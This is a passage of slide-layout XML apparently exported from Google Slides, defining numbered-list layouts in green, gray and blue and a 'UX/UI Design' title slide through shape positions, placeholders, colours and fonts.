      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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145" name="Google Shape;145;p1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46" name="Google Shape;146;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="504"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p1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9" name="Google Shape;149;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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50" name="Google Shape;150;p1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51" name="Google Shape;151;p17"/>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2" name="Google Shape;152;p17"/>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5005">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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17. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p18"/>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6" name="Google Shape;156;p1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57" name="Google Shape;157;p1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58" name="Google Shape;158;p1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59" name="Google Shape;159;p1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60" name="Google Shape;160;p1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61" name="Google Shape;161;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p18"/>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63" name="Google Shape;163;p18"/>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 name="Google Shape;164;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="Google Shape;165;p18"/>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66" name="Google Shape;166;p18"/>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7" name="Google Shape;167;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Google Shape;168;p18"/>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69" name="Google Shape;169;p18"/>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0" name="Google Shape;170;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p18"/>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72" name="Google Shape;172;p18"/>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3" name="Google Shape;173;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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4" name="Google Shape;174;p18"/>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8"/>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8"/>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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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8" name="Google Shape;178;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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9" name="Google Shape;179;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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18. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 180"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p19"/>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3" name="Google Shape;183;p1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84" name="Google Shape;184;p1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85" name="Google Shape;185;p1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86" name="Google Shape;186;p1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87" name="Google Shape;187;p1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88" name="Google Shape;188;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189;p19"/>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90" name="Google Shape;190;p19"/>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1" name="Google Shape;191;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Google Shape;192;p19"/>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93" name="Google Shape;193;p19"/>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 name="Google Shape;194;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195;p19"/>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96" name="Google Shape;196;p19"/>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 name="Google Shape;197;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;p19"/>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99" name="Google Shape;199;p19"/>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0" name="Google Shape;200;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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1" name="Google Shape;201;p19"/>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9"/>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19"/>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19"/>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5" name="Google Shape;205;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2695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6" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="33855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07" name="Google Shape;207;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F5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09" name="Google Shape;209;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F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0" name="Google Shape;210;p19"/>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9"/>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19. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p20"/>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15" name="Google Shape;215;p2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16" name="Google Shape;216;p2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17" name="Google Shape;217;p2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18" name="Google Shape;218;p2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19" name="Google Shape;219;p2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20" name="Google Shape;220;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Google Shape;221;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22" name="Google Shape;222;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3" name="Google Shape;223;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="12746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24" name="Google Shape;224;p20"/>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5" name="Google Shape;225;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Google Shape;226;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27" name="Google Shape;227;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8" name="Google Shape;228;p20"/>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9" name="Google Shape;229;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Google Shape;230;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31" name="Google Shape;231;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2" name="Google Shape;232;p20"/>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3" name="Google Shape;233;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Google Shape;234;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35" name="Google Shape;235;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6" name="Google Shape;236;p20"/>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7" name="Google Shape;237;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;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39" name="Google Shape;239;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0" name="Google Shape;240;p20"/>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1" name="Google Shape;241;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Google Shape;242;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43" name="Google Shape;243;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4" name="Google Shape;244;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="18488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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="24399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6" name="Google Shape;246;p20"/>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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088"/>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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="4236125"/>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2. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Google Shape;18;p3"/>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19" name="Google Shape;19;p3"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Google Shape;21;p3"/>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22" name="Google Shape;22;p3"/>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 name="Google Shape;23;p3"/>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 name="Google Shape;24;p3"/>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25" name="Google Shape;25;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="584735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;26;p3"/>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20. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p21"/>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2" name="Google Shape;252;p2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53" name="Google Shape;253;p2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54" name="Google Shape;254;p2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55" name="Google Shape;255;p2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56" name="Google Shape;256;p2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57" name="Google Shape;257;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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59" name="Google Shape;259;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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0" name="Google Shape;260;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="12746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1" name="Google Shape;261;p21"/>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2" name="Google Shape;262;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="Google Shape;263;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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64" name="Google Shape;264;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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5" name="Google Shape;265;p21"/>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6" name="Google Shape;266;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Google Shape;267;p21"/>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68" name="Google Shape;268;p21"/>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9" name="Google Shape;269;p21"/>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0" name="Google Shape;270;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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72" name="Google Shape;272;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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3" name="Google Shape;273;p21"/>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4" name="Google Shape;274;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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76" name="Google Shape;276;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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7" name="Google Shape;277;p21"/>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8" name="Google Shape;278;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Google Shape;279;p21"/>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80" name="Google Shape;280;p21"/>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1" name="Google Shape;281;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813"/>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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="2439925"/>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3" name="Google Shape;283;p21"/>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4" name="Google Shape;284;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="362210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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="42361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21. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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2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9" name="Google Shape;289;p2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90" name="Google Shape;290;p2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91" name="Google Shape;291;p2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92" name="Google Shape;292;p2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93" name="Google Shape;293;p2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94" name="Google Shape;294;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;295;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296" name="Google Shape;296;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7" name="Google Shape;297;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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8" name="Google Shape;298;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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9" name="Google Shape;299;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;300;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301" name="Google Shape;301;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2" name="Google Shape;302;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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3" name="Google Shape;303;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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4" name="Google Shape;304;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="305" name="Google Shape;305;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306" name="Google Shape;306;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7" name="Google Shape;307;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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8" name="Google Shape;308;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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9" name="Google Shape;309;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Google Shape;310;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311" name="Google Shape;311;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2" name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
